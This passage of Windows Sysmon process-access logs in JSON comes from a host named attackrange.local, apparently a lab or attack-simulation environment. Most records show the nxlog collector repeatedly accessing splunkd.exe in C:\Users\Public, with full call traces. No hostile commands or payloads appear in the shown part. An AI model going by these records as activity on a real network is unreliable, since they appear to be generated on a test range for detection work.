07:00:04.931","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12F4-5F25-0000-0010DDA20A00}","TargetProcessId":"668","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7245,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:05.572\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:05.572","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:06","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7246,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:06.572\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:06.572","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:07","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7247,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:07.588\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:07.588","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7248,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:08.588\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:08.588","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7249,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:09.588\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:09.588","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7250,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:10.588\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:10.588","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7251,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:11.588\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: 